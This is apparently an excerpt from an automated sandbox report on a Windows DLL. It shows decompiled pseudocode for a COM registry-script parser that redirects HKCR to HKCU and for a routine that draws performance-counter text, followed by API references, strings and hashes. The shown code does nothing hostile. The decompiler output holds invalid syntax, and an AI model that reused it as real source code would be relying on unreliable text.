					_v92 = _t98;
					_t99 = _t98 * 2;
					_t242 = _t98 * 2 >> 0x20;
					if(_t242 > 0 || _t242 >= 0 && _t99 > 0xffffffff) {
						_t99 = 0;
						_v88 = 0;
					} else {
						__imp__CoTaskMemAlloc(_t99);
						_v88 = _t99;
						if(_t99 != 0) {
							 *_t99 = 0;
						}
					}
					_v8 = 0;
					if(_t99 == 0) {
						L36:
						__imp__CoTaskMemFree(_v88);
						goto L57;
					} else {
						_t101 = 0;
						 *_t220 = _t226;
						_t183 = 0;
						_v99 = 0;
						_v104 = 0;
						_v98 = 0;
						_v97 = 0;
						if( *_t226 == 0) {
							L55:
							_v88 = 0;
							 *_v112 = _v88;
							__imp__CoTaskMemFree(_v88);
							goto L57;
						} else {
							_t165 = CharNextW;
							while(1) {
								_v108 = _t101;
								if(_t183 != 1) {
									goto L33;
								}
								if(_t101 != 0) {
									L20:
									_t147 =  *_t220;
									if(0x27 !=  *_t147) {
										L27:
										if(_t183 != 0) {
											goto L33;
										} else {
											goto L28;
										}
									} else {
										if(_t183 != 0) {
											if(0x27 ==  *(CharNextW(_t147))) {
												 *_t220 = CharNextW( *_t220);
												if(E6E7DDF40(_t165,  &_v96, _t152, 1) == 0) {
													goto L36;
												} else {
													_t183 = _v97;
													goto L27;
												}
											} else {
												_v97 = 0;
												L28:
												_t31 = _v108 + 1; // 0x1
												_t217 =  !=  ? _v108 : _t31;
												_v104 = _t217;
												if(( *( *_t220) & 0x0000ffff) != 0x7d) {
													goto L33;
												} else {
													_t218 = _t217 + 0xffffffff;
													_v104 = _t218;
													if(_t218 != 0 || _v98 != 1) {
														goto L33;
													} else {
														if(E6E7DDFF0(_t165,  &_v96, _t220, 0x27, L"\r\n\t}\r\n}\r\n") == 0) {
															goto L36;
														} else {
															_v98 = 0;
															goto L33;
														}
													}
												}
											}
										} else {
											_v97 = 1;
											goto L33;
										}
									}
								} else {
									_push(L"HKCR");
									_push(_t226);
									_t155 = E6E7E86E5(_t183);
									_t237 = _t237 + 8;
									if(_t155 == 0) {
										L19:
										_t183 = _v97;
										goto L20;
									} else {
										_t208 =  *_t220;
										if(_t155 != _t208) {
											goto L19;
										} else {
											_t156 = CharNextW(_t208);
											 *_t220 = _t156;
											_t157 = CharNextW(_t156);
											 *_t220 = _t157;
											_t158 = CharNextW(_t157);
											 *_t220 = _t158;
											 *_t220 = CharNextW(_t158);
											if(E6E7DDFF0(_t165,  &_v96, _t220, _t226, L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses") == 0) {
												goto L36;
											} else {
												_v98 = 1;
												goto L19;
											}
										}
									}
								}
								goto L82;
								L33:
								_t104 =  *_t220;
								if( *_t104 != 0x25) {
									L35:
									if(E6E7DDF40(_t165,  &_v96, _t104, 1) != 0) {
										goto L52;
									} else {
										goto L36;
									}
								} else {
									_t104 = CharNextW(_t104);
									 *_t220 = _t104;
									if( *_t104 != 0x25) {
										_t107 = E6E7DE440(_t104, 0x25);
										_v108 = _t107;
										if(_t107 == 0) {
											L42:
											__imp__CoTaskMemFree(_v88);
											goto L57;
										} else {
											_t214 =  *_t220;
											_t190 = _t107 -  *_t220 >> 1;
											if(_t190 > 0x1f) {
												__imp__CoTaskMemFree(_v88);
												L57:
												 *[fs:0x0] = _v16;
												return E6E7E440A(_v20 ^ _t234);
											} else {
												_push(_t190);
												E6E7DD800(_t165, _t214, E6E7F5A69(_t190,  &_v84, 0x20, _t214));
												_t168 = _t220[1];
												_t228 = 0;
												_t237 = _t237 + 0x14;
												if(_t168[6] <= 0) {
													goto L42;
												} else {
													while(1) {
														_t191 =  &_v84;
														if(lstrcmpiW( *(_t168[2] + _t228 * 4), _t191) == 0) {
															break;
														}
														_t228 = _t228 + 1;
														if(_t228 < _t168[6]) {
															continue;
														} else {
															goto L42;
														}
														goto L82;
													}
													if(_t228 == 0xffffffff) {
														goto L42;
													} else {
														if(_t228 < 0 || _t228 >= _t168[6]) {
															E6E7D81A0(_t114, 0xc000008c, 1);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t234);
															_t235 = _t237;
															E6E807C50();
															_t117 =  *0x6e81e008; // 0x77dcee0d
															_v144 = _t117 ^ _t237;
															_push(_t168);
															_t169 = _t191;
															_v8340 = 0;
															_push(_t228);
															_t120 = E6E7DED30(_t169, _t169, _t220, _t228, _v132,  &_v8340);
															_t229 = _t120;
															if(_t120 >= 0) {
																_t122 = _v8208;
																 *_t169 = _t122;
																if(0 !=  *_t122) {
																	_push(_t220);
																	while(1) {
																		_t125 = E6E7DE4E0(_t169,  &_v8204);
																		_t229 = _t125;
																		if(_t125 < 0) {
																			break;
																		}
																		_t223 = 0;
																		_t231 = 0;
																		while(1) {
																			_t71 = _t231 + 0x6e818400; // 0x6e817d3c
																			if(lstrcmpiW( &_v8204,  *_t71) == 0) {
																				break;
																			}
																			_t231 = _t231 + 8;
																			_t223 = _t223 + 1;
																			if(_t231 < 0x70) {
																				continue;
																			} else {
																				L66:
																				_t229 = 0x80020009;
																			}
																			goto L67;
																		}
																		_t224 =  *((intOrPtr*)(0x6e818404 + _t223 * 8));
																		if(_t224 == 0) {
																			goto L66;
																		} else {
																			_t129 = E6E7DE4E0(_t169,  &_v8204);
																			_t229 = _t129;
																			if(_t129 < 0) {
																				break;
																			} else {
																				if(0x7b != _v8204) {
																					goto L66;
																				} else {
																					_t199 = _a4;
																					_push(0);
																					if(_t199 == 0) {
																						_push(0);
																						_push(_t224);
																						_push( &_v8204);
																						_t132 = E6E7DF210(_t169, _t169, _t224, _t229, _t258);
																						_t229 = _t132;
																						if(_t132 < 0) {
																							break;
																						} else {
																							goto L77;
																						}
																					} else {
																						_push(_t199);
																						_v8212 =  *_t169;
																						_push(_t224);
																						_push( &_v8204);
																						_t139 = E6E7DF210(_t169, _t169, _t224, _t229, _t258);
																						_t229 = _t139;
																						if(_t139 >= 0) {
																							while(1) {
																								L77:
																								_t201 =  *_t169;
																								_t215 =  *_t201 & 0x0000ffff;
																								_t133 = _t215 - 9;
																								if(_t133 > 0x17) {
																									break;
																								}
																								switch( *((intOrPtr*)(( *(_t133 + 0x6e7df1f4) & 0x000000ff) * 4 +  &M6E7DF1EC))) {
																									case 0:
																										goto L79;
																									case 1:
																										goto L80;
																								}
																							}
																							L80:
																							if(0 != _t215) {
																								continue;
																							} else {
																								break;
																							}
																						} else {
																							 *_t169 = _v8212;
																							E6E7DF210(_t169, _t169, _t224, _t229, _t258,  &_v8204, _t224, 0, 0);
																							break;
																						}
																					}
																				}
																			}
																		}
																		goto L69;
																	}
																	L67:
																}
																__imp__CoTaskMemFree(_v8208);
															}
															L69:
															return E6E7E440A(_v12 ^ _t235);
														} else {
															_t144 =  *((intOrPtr*)(_t168[4] + _t228 * 4));
															if( *((intOrPtr*)(_t168[4] + _t228 * 4)) == 0) {
																goto L42;
															} else {
																if(E6E7DDFF0(_t168,  &_v96, _t220, _t228, _t144) == 0) {
																	goto L36;
																} else {
																	_t171 = _v108;
																	if( *_t220 != _t171) {
																		do {
																			_t146 = CharNextW( *_t220);
																			 *_t220 = _t146;
																		} while (_t146 != _t171);
																	}
																	_t165 = CharNextW;
																	L52:
																	_t226 = CharNextW( *_t220);
																	 *_t220 = _t226;
																	if( *_t226 == 0) {
																		goto L55;
																	} else {
																		_t101 = _v104;
																		_t183 = _v99;
																		continue;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										goto L35;
									}
								}
								goto L82;
							}
						}
					}
				}
				L82:
			}

0x6e7ded33
0x6e7ded35
0x6e7ded40
0x6e7ded41
0x6e7ded44
0x6e7ded49
0x6e7ded4b
0x6e7ded4e
0x6e7ded4f
0x6e7ded50
0x6e7ded51
0x6e7ded55
0x6e7ded5b
0x6e7ded5d
0x6e7ded60
0x6e7ded63
0x6e7ded68
0x00000000
0x6e7ded76
0x6e7ded76
0x6e7ded78
0x6e7ded7e
0x6e7ded7e
0x6e7ded81
0x6e7ded81
0x6e7ded84
0x6e7ded87
0x6e7ded8e
0x6e7ded97
0x6e7ded9a
0x6e7ded9f
0x6e7dedb1
0x6e7dedb9
0x6e7dedbc
0x6e7dedbe
0x6e7dedc0
0x6e7dedde
0x6e7dede0
0x6e7dedc9
0x6e7dedca
0x6e7dedd0
0x6e7dedd5
0x6e7dedd9
0x6e7dedd9
0x6e7dedd5
0x6e7dede3
0x6e7dedec
0x6e7def1b
0x6e7def23
0x00000000
0x6e7dedf2
0x6e7dedf2
0x6e7dedf4
0x6e7dedfc
0x6e7dedfe
0x6e7dee01
0x6e7dee04
0x6e7dee07
0x6e7dee0d
0x6e7df01f
0x6e7df027
0x6e7df031
0x6e7df033
0x00000000
0x6e7dee13
0x6e7dee13
0x6e7dee20
0x6e7dee20
0x6e7dee26
0x00000000
0x00000000
0x6e7dee2e
0x6e7dee78
0x6e7dee78
0x6e7dee82
0x6e7deeb5
0x6e7deeb7
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7dee84
0x6e7dee86
0x6e7dee94
0x6e7deea7
0x6e7deeb0
0x00000000
0x6e7deeb2
0x6e7deeb2
0x00000000
0x6e7deeb2
0x6e7dee96
0x6e7dee98
0x6e7deeb9
0x6e7deec4
0x6e7deec7
0x6e7deeca
0x6e7deed0
0x00000000
0x6e7deed2
0x6e7deed2
0x6e7deed5
0x6e7deed8
0x00000000
0x6e7deee0
0x6e7deeef
0x00000000
0x6e7deef1
0x6e7deef1
0x00000000
0x6e7deef1
0x6e7deeef
0x6e7deed8
0x6e7deed0
0x6e7dee88
0x6e7dee88
0x00000000
0x6e7dee88
0x6e7dee86
0x6e7dee30
0x6e7dee30
0x6e7dee35
0x6e7dee36
0x6e7dee3b
0x6e7dee40
0x6e7dee75
0x6e7dee75
0x00000000
0x6e7dee42
0x6e7dee42
0x6e7dee46
0x00000000
0x6e7dee48
0x6e7dee49
0x6e7dee4c
0x6e7dee4e
0x6e7dee51
0x6e7dee53
0x6e7dee56
0x6e7dee62
0x6e7dee6b
0x00000000
0x6e7dee71
0x6e7dee71
0x00000000
0x6e7dee71
0x6e7dee6b
0x6e7dee46
0x6e7dee40
0x00000000
0x6e7deef5
0x6e7deef5
0x6e7deefb
0x6e7def08
0x6e7def15
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7deefd
0x6e7deefe
0x6e7def00
0x6e7def06
0x6e7def37
0x6e7def3c
0x6e7def41
0x6e7def8e
0x6e7def96
0x00000000
0x6e7def43
0x6e7def43
0x6e7def49
0x6e7def4e
0x6e7df015
0x6e7df042
0x6e7df045
0x6e7df05d
0x6e7def54
0x6e7def54
0x6e7def62
0x6e7def67
0x6e7def6a
0x6e7def6c
0x6e7def72
0x00000000
0x6e7def74
0x6e7def74
0x6e7def77
0x6e7def86
0x00000000
0x00000000
0x6e7def88
0x6e7def8c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7def8c
0x6e7defa6
0x00000000
0x6e7defa8
0x6e7defaa
0x6e7df067
0x6e7df06c
0x6e7df06d
0x6e7df06e
0x6e7df06f
0x6e7df070
0x6e7df071
0x6e7df078
0x6e7df07d
0x6e7df084
0x6e7df08a
0x6e7df08b
0x6e7df08d
0x6e7df097
0x6e7df0a2
0x6e7df0a7
0x6e7df0ab
0x6e7df0ad
0x6e7df0b5
0x6e7df0ba
0x6e7df0bc
0x6e7df0c0
0x6e7df0c9
0x6e7df0ce
0x6e7df0d2
0x00000000
0x00000000
0x6e7df0d4
0x6e7df0d6
0x6e7df0e0
0x6e7df0e0
0x6e7df0f5
0x00000000
0x00000000
0x6e7df0f7
0x6e7df0fa
0x6e7df0fe
0x00000000
0x6e7df100
0x6e7df100
0x6e7df100
0x6e7df100
0x00000000
0x6e7df0fe
0x6e7df126
0x6e7df12f
0x00000000
0x6e7df131
0x6e7df13a
0x6e7df13f
0x6e7df143
0x00000000
0x6e7df145
0x6e7df151
0x00000000
0x6e7df153
0x6e7df153
0x6e7df156
0x6e7df15a
0x6e7df19a
0x6e7df19c
0x6e7df1a5
0x6e7df1a6
0x6e7df1ab
0x6e7df1af
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7df15c
0x6e7df15e
0x6e7df15f
0x6e7df167
0x6e7df16e
0x6e7df16f
0x6e7df174
0x6e7df178
0x6e7df1b5
0x6e7df1b5
0x6e7df1b5
0x6e7df1b7
0x6e7df1ba
0x6e7df1c0
0x00000000
0x00000000
0x6e7df1c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7df1c9
0x6e7df1db
0x6e7df1e0
0x00000000
0x6e7df1e6
0x00000000
0x6e7df1e6
0x6e7df17a
0x6e7df186
0x6e7df190
0x00000000
0x6e7df190
0x6e7df178
0x6e7df15a
0x6e7df151
0x6e7df143
0x00000000
0x6e7df12f
0x6e7df105
0x6e7df105
0x6e7df10c
0x6e7df112
0x6e7df114
0x6e7df123
0x6e7defb9
0x6e7defbc
0x6e7defc1
0x00000000
0x6e7defc3
0x6e7defce
0x00000000
0x6e7defd4
0x6e7defd4
0x6e7defd9
0x6e7defe1
0x6e7defe3
0x6e7defe5
0x6e7defe7
0x6e7defe1
0x6e7defeb
0x6e7deff1
0x6e7deff5
0x6e7deff7
0x6e7deffd
0x00000000
0x6e7defff
0x6e7defff
0x6e7df005
0x00000000
0x6e7df005
0x6e7deffd
0x6e7defce
0x6e7defc1
0x6e7defaa
0x6e7defa6
0x6e7def72
0x6e7def4e
0x00000000
0x00000000
0x00000000
0x6e7def06
0x00000000
0x6e7deefb
0x6e7dee20
0x6e7dee0d
0x6e7dedec
0x00000000

APIs

CoTaskMemAlloc.OLE32(6E7DE3C8,77DCEE0D,00000000,00000000), ref: 6E7DEDCA
CharNextW.USER32(?,00000000), ref: 6E7DEE49
CharNextW.USER32(00000000,?,00000000), ref: 6E7DEE4E
CharNextW.USER32(00000000,?,00000000), ref: 6E7DEE53
CharNextW.USER32(00000000,?,00000000), ref: 6E7DEE58
CharNextW.USER32(?,?,77DCEE0D,00000000,00000000), ref: 6E7DEE8F
CharNextW.USER32(?,?,77DCEE0D,00000000,00000000), ref: 6E7DEE9F
CharNextW.USER32(00000000,?,77DCEE0D,00000000,00000000), ref: 6E7DEEFE
CoTaskMemFree.OLE32(00000000,77DCEE0D,00000000,00000000), ref: 6E7DEF23
lstrcmpiW.KERNEL32(?,?,?,77DCEE0D,00000000,00000000), ref: 6E7DEF7E
CoTaskMemFree.OLE32(00000000,?,77DCEE0D,00000000,00000000), ref: 6E7DEF96
CharNextW.USER32(?,?,77DCEE0D,00000000,00000000), ref: 6E7DEFE3
CharNextW.USER32(?,77DCEE0D,00000000,00000000), ref: 6E7DEFF3
CoTaskMemFree.OLE32(00000000,?,77DCEE0D,00000000,00000000), ref: 6E7DF015
CoTaskMemFree.OLE32(00000000,77DCEE0D,00000000,00000000), ref: 6E7DF033
lstrcmpiW.KERNEL32(?,6E817D3C,?,?,C000008C,00000000,00000000), ref: 6E7DF0ED
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6E7DF10C
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 6E7DF1D1

Strings

HKCR, xrefs: 6E7DEE30
}}, xrefs: 6E7DEEE0
HKCU{Software{Classes, xrefs: 6E7DEE5A

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2337762536-1142484189
Opcode ID: 6fd62b31f6230f04e582dccfe53257698b2239df1e38c402c610600c552bd7eb
Instruction ID: 48ac3c97c7df21394ac753e75aa80dceec48c798ffd7085a60a8f8b92603773f
Opcode Fuzzy Hash: 6fd62b31f6230f04e582dccfe53257698b2239df1e38c402c610600c552bd7eb
Instruction Fuzzy Hash: 85E1C431D0021A9FEB559FE4CA9479EB7F8EF05304F204579E905EB2A4EB359948CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E1300, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E6E7E1300(signed int __ecx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				int _v16;
				char _v24;
				signed int _v32;
				char _v548;
				char _v1060;
				short _v3108;
				char _v5156;
				intOrPtr _v5160;
				signed int _v5164;
				int _v5168;
				int _v5172;
				int _v5176;
				int _v5180;
				char _v5184;
				char _v5188;
				struct tagRECT _v5204;
				intOrPtr _v5208;
				signed int _v5212;
				int _v5216;
				int _v5220;
				int _v5224;
				int _v5228;
				char _v5232;
				char _v5236;
				struct tagTEXTMETRICW _v5296;
				WCHAR* _v5300;
				signed int _v5304;
				signed short* _v5308;
				struct HDC__* _v5312;
				char _v5316;
				int _v5320;
				signed int _v5324;
				signed int _v5328;
				intOrPtr* _v5332;
				intOrPtr _v5336;
				char _v5340;
				void* __ebx;
				void* __ebp;
				signed int _t193;
				signed int _t194;
				intOrPtr _t197;
				signed int _t200;
				intOrPtr _t201;
				intOrPtr _t232;
				intOrPtr _t241;
				int _t244;
				void* _t247;
				void* _t250;
				signed int _t251;
				signed int _t264;
				intOrPtr _t266;
				signed int _t271;
				signed short* _t279;
				signed short* _t287;
				signed int _t290;
				signed int _t294;
				void* _t300;
				intOrPtr _t317;
				intOrPtr* _t319;
				signed short _t324;
				void* _t325;
				intOrPtr _t327;
				signed int _t328;
				signed short* _t330;
				signed short _t332;
				intOrPtr _t335;
				void* _t339;
				unsigned int _t342;
				signed short _t343;
				intOrPtr* _t344;
				signed short* _t347;
				signed int _t348;
				signed int _t352;
				intOrPtr* _t354;
				signed short* _t355;
				struct HDC__* _t357;
				void* _t358;
				signed int _t362;
				intOrPtr* _t363;
				signed int _t365;
				intOrPtr _t367;
				intOrPtr* _t368;
				int _t370;
				void* _t371;
				void* _t373;
				intOrPtr* _t374;
				intOrPtr _t375;
				signed int _t378;
				void* _t380;
				signed int _t383;
				void* _t387;
				void* _t388;
				void* _t391;
				void* _t413;

				_t413 = __fp0;
				_t300 = _t380;
				_t383 = (_t380 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t300 + 4));
				_t378 = _t383;
				_push(0xffffffff);
				_push(E6E80947B);
				_push( *[fs:0x0]);
				_push(_t300);
				E6E807C50();
				_t193 =  *0x6e81e008; // 0x77dcee0d
				_t194 = _t193 ^ _t378;
				_v32 = _t194;
				_push(_t194);
				 *[fs:0x0] =  &_v24;
				_t365 = __ecx;
				_v5324 = __ecx;
				_t335 =  *((intOrPtr*)(__ecx + 0x78));
				_v5312 =  *((intOrPtr*)(_t300 + 8));
				_t197 =  *((intOrPtr*)(__ecx + 0x7c));
				if(_t335 != _t197) {
					_t352 =  *(__ecx + 0x8c);
					_t200 = _t197 - _t335 >> 4;
					if(_t200 <= _t352) {
						_t352 = _t200 - 1;
						 *(__ecx + 0x8c) = _t352;
					}
					_t354 = (_t352 << 4) + _t335;
					_v5332 = _t354;
					_t201 =  *((intOrPtr*)(_t354 + 4));
					if(_t201 !=  *((intOrPtr*)(_t354 + 8))) {
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x1468], xmm0");
						asm("movups [ebp-0x1458], xmm0");
						__imp__PdhCollectQueryData( *((intOrPtr*)(_t365 + 0x40)));
						if(_t201 == 0) {
							asm("xorps xmm0, xmm0");
							_t306 =  &_v5188;
							asm("movups [ebp-0x1438], xmm0");
							asm("movups [ebp-0x1428], xmm0");
							E6E7E3B40(_t300,  &_v5188, _t413);
							_v16 = 0;
							_t365 =  *(_t365 + 0x44);
							__eflags = _t365 -  *((intOrPtr*)(_v5324 + 0x48));
							if(__eflags != 0) {
								_t363 = __imp__PdhGetFormattedCounterValue;
								do {
									_t294 =  *_t363( *((intOrPtr*)(_t365 + 0x18)), 0x200, 0,  &_v5204);
									__eflags = _t294;
									if(_t294 == 0) {
										_t306 =  &_v5188;
										E6E7E3E00(_t300,  &_v5188, _t413,  &_v5340, _t365);
										asm("movsd xmm0, [ebp-0x1440]");
										asm("movsd [eax+0x20], xmm0");
									}
									_t365 = _t365 + 0x1c;
									__eflags = _t365 -  *((intOrPtr*)(_v5324 + 0x48));
								} while (__eflags != 0);
								_t354 = _v5332;
							}
							_v5236 = _v5188;
							_v5228 = 0;
							_v5184 = E6E7E4010(_t306, _t335, __eflags, 0, 0);
							_v5232 = _v5184;
							_v5228 = _v5180;
							_v5224 = _v5176;
							_v5220 = _v5172;
							_v5216 = _v5168;
							_v5212 = _v5164;
							_v5180 = _v5228;
							_v5176 = 0;
							_v5172 = 0;
							_v5168 = 0;
							_v5208 = _v5160;
							_v16 = 1;
							E6E7E2460(_t300,  &_v5184, _t354);
							__eflags = _v5168 - _v5176 >> 2 - 0x10;
							if(_v5168 - _v5176 >> 2 < 0x10) {
								E6E7DC0A0( &_v5176, _t335, _t413, 0x10);
							}
							_v5316 = _v5184;
							E6E7DBDD0(_t300,  &_v5176, _t354, _t365, _t413, 0x10,  &_v5316);
							_v5164 = 7;
							_v5160 = 8;
							E6E7E1A20(_t300,  &_v5188, _t354, _t365);
						} else {
							E6E7E3B40(_t300,  &_v5236, _t413);
						}
						GetTextMetricsW(_v5312,  &_v5296);
						E6E7E8BE0(_t354,  &_v3108, 0, 0x800);
						E6E7E8BE0(_t354,  &_v5156, 0, 0x800);
						_t387 = _t383 + 0x18;
						_v5328 = 0;
						if(((0x92492493 * ( *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4))) >> 0x20) +  *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4)) >> 5 >> 0x1f) + ((0x92492493 * ( *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4))) >> 0x20) +  *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4)) >> 5) != 0) {
							_t232 = 0;
							_v5316 = 0;
							do {
								_v3108 = 0;
								_t367 =  *((intOrPtr*)(_t354 + 4));
								_t355 =  *(_t367 + _t232 + 0x28);
								_t368 = _t367 + _t232;
								_v5320 = _t368;
								_v5308 = _t355;
								if(_t355 !=  *((intOrPtr*)(_t368 + 0x2c))) {
									asm("o16 nop [eax+eax]");
									do {
										_t343 = _t355;
										_t324 = _t355[8];
										if(_t355[0xa] >= 8) {
											_t343 =  *_t355;
										}
										_t373 = _t324 + _t324;
										_t263 = 0x811c9dc5;
										_t325 = 0;
										if(_t373 != 0) {
											_t362 = 0x811c9dc5;
											do {
												_t290 =  *(_t325 + _t343) & 0x000000ff;
												_t325 = _t325 + 1;
												_t362 = (_t290 ^ _t362) * 0x1000193;
											} while (_t325 < _t373);
											_v5304 = _t362;
											_t355 = _v5308;
											_t263 = _v5304;
										}
										_t264 = _t263 & _v5212;
										_v5304 = _t264;
										_t344 =  *((intOrPtr*)(_v5224 + _t264 * 8));
										_t374 = _t344;
										_v5336 = _t344;
										while(1) {
											_t327 = _v5232;
											if(_t344 != _t327) {
												_t266 =  *((intOrPtr*)( *((intOrPtr*)(_v5224 + 4 + _t264 * 8))));
											} else {
												_t266 = _t327;
											}
											if(_t374 == _t266) {
												break;
											}
											_t347 = _t374 + 8;
											_v5300 = _t347;
											_t287 = _t355;
											if(_t355[0xa] >= 8) {
												_t287 =  *_t355;
											}
											_t332 = _t347[8];
											if(_t347[0xa] >= 8) {
												_t347 =  *_t347;
												_v5300 = _t347;
											}
											if(_t332 != _t355[8]) {
												L41:
												_t374 =  *_t374;
												_t264 = _v5304;
												_t344 = _v5336;
												continue;
											} else {
												if(_t332 == 0) {
													L42:
													__eflags = E6E7DD2E0(_t355, _t374 + 8);
													_t375 =  !=  ? _v5232 : _t374;
												} else {
													_t348 =  *_t347 & 0x0000ffff;
													_t355 = _v5308;
													if(_t348 >= ( *_t287 & 0x0000ffff)) {
														_v5300 = _v5300 - _t287;
														asm("o16 nop [eax+eax]");
														while(1) {
															_t355 = _v5308;
															if(_t348 > ( *_t287 & 0x0000ffff)) {
																goto L41;
															}
															if(_t332 == 1) {
																goto L42;
															} else {
																_t287 =  &(_t287[1]);
																_t332 = _t332 - 1;
																_t348 =  *(_v5300 + _t287) & 0x0000ffff;
																_t355 = _v5308;
																if(_t348 >= ( *_t287 & 0x0000ffff)) {
																	continue;
																} else {
																	goto L41;
																}
															}
															goto L44;
														}
													}
													goto L41;
												}
											}
											goto L44;
										}
										_t375 = _t327;
										L44:
										E6E7E8BE0(_t355,  &_v548, 0, 0x200);
										_t388 = _t387 + 0xc;
										__eflags = _t375 - _v5232;
										if(__eflags != 0) {
											asm("movsd xmm1, [edi+0x50]");
											asm("xorps xmm2, xmm2");
											asm("comisd xmm1, xmm2");
											asm("movsd xmm0, [esi+0x20]");
											asm("movsd [ebp-0x14d0], xmm0");
											if(__eflags > 0) {
												asm("divsd xmm0, xmm1");
												asm("movsd [ebp-0x14d0], xmm0");
											}
											E6E7E8BE0(_t355,  &_v1060, 0, 0x200);
											_t271 = _t355[0x26];
											_t328 = _t355[0x24];
											__eflags = _t271;
											_push("f");
											_t272 =  <=  ? 0 : _t271;
											_push( <=  ? 0 : _t271);
											__eflags = _t328;
											_t329 =  <=  ? 0 : _t328;
											__eflags =  <=  ? 0 : _t328;
											E6E7DD7C0( &_v1060, 0x100, L"%s%d.%d%s", "%");
											asm("movsd xmm0, [ebp-0x14d0]");
											asm("movsd [esp], xmm0");
											E6E7DD7C0( &_v548, 0x100,  &_v1060,  <=  ? 0 : _t328);
											_t391 = _t388 + 0x34;
										} else {
											E6E7F5B80( &_v548, 0x100, L"[N/A]");
											_t391 = _t388 + 0xc;
										}
										__eflags = _t355[0x22] - 8;
										_t330 =  &(_t355[0x18]);
										if(_t355[0x22] >= 8) {
											_t330 =  *_t330;
										}
										__eflags = _t355[0x16] - 8;
										_t279 =  &(_t355[0xc]);
										if(_t355[0x16] >= 8) {
											_t279 =  *_t279;
										}
										_push(_t330);
										_push( &_v548);
										E6E7DD7C0( &_v5156, 0x400, L"%s%s%s", _t279);
										E6E7F5B0B( &_v3108, 0x400,  &_v5156);
										_t368 = _v5320;
										_t355 =  &(_t355[0x2c]);
										_t387 = _t391 + 0x24;
										_v5308 = _t355;
										__eflags = _t355 -  *((intOrPtr*)(_t368 + 0x2c));
									} while (_t355 !=  *((intOrPtr*)(_t368 + 0x2c)));
								}
								GetClientRect( *(_v5324 + 0x18),  &_v5204);
								_v5300 = _t368;
								_t317 =  *((intOrPtr*)(_t300 + 0x10));
								_v5204.top = _v5204.top + (_v5296.tmHeight - _v5296.tmExternalLeading) * _v5328 +  *_v5332 + _t317;
								_t241 =  *((intOrPtr*)(_t300 + 0xc));
								_v5204.bottom = _v5204.bottom + _t317;
								_v5204.left = _v5204.left + _t241;
								_v5204.right = _v5204.right + _t241;
								__eflags =  *((intOrPtr*)(_t368 + 0x14)) - 8;
								if( *((intOrPtr*)(_t368 + 0x14)) >= 8) {
									_v5300 =  *_t368;
								}
								__eflags =  *((char*)(_v5320 + 0x18));
								_t370 =  !=  ? 0x2bc : 0;
								__eflags = _t370;
								_t244 = GetDeviceCaps(_v5312, 0x5a);
								asm("cvttsd2si ecx, [ecx+0x20]");
								_t247 = CreateFontW( ~(MulDiv(_v5320, _t244, 0x48)), 0, 0, 0, _t370,  *(_t368 + 0x19) & 0x000000ff, 0, 0, 0, 0, 0, 0, 0, _v5300);
								_t357 = _v5312;
								_t371 = _t247;
								SetTextColor(_t357,  *(_v5320 + 0x1c));
								_t250 = SelectObject(_t357, _t371);
								_t319 =  &_v3108;
								_t358 = _t250;
								_t339 = _t319 + 2;
								do {
									_t251 =  *_t319;
									_t319 = _t319 + 2;
									__eflags = _t251;
								} while (_t251 != 0);
								DrawTextW(_v5312,  &_v3108, _t319 - _t339 >> 1,  &_v5204, 0);
								SelectObject(_v5312, _t358);
								DeleteObject(_t371);
								_t354 = _v5332;
								_v5316 = _v5316 + 0x38;
								_t365 = _v5328 + 1;
								_v5328 = _t365;
								_t342 = (0x92492493 * ( *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4))) >> 0x20) +  *((intOrPtr*)(_t354 + 8)) -  *((intOrPtr*)(_t354 + 4)) >> 5;
								__eflags = _t365 - (_t342 >> 0x1f) + _t342;
								_t232 = _v5316;
							} while (_t365 < (_t342 >> 0x1f) + _t342);
						}
						E6E7E1A20(_t300,  &_v5236, _t354, _t365);
					}
				}
				 *[fs:0x0] = _v24;
				__eflags = _v32 ^ _t378;
				return E6E7E440A(_v32 ^ _t378);
			}

0x6e7e1300
0x6e7e1301
0x6e7e1309
0x6e7e1310
0x6e7e1314
0x6e7e1316
0x6e7e1318
0x6e7e1323
0x6e7e1324
0x6e7e132a
0x6e7e132f
0x6e7e1334
0x6e7e1336
0x6e7e133b
0x6e7e133f
0x6e7e1345
0x6e7e1347
0x6e7e1350
0x6e7e1353
0x6e7e1359
0x6e7e135e
0x6e7e1364
0x6e7e136c
0x6e7e1371
0x6e7e1373
0x6e7e1376
0x6e7e1376
0x6e7e137f
0x6e7e1381
0x6e7e1387
0x6e7e138d
0x6e7e1396
0x6e7e1399
0x6e7e13a0
0x6e7e13a7
0x6e7e13af
0x6e7e13c1
0x6e7e13c4
0x6e7e13ca
0x6e7e13d1
0x6e7e13d8
0x6e7e13e3
0x6e7e13ea
0x6e7e13ed
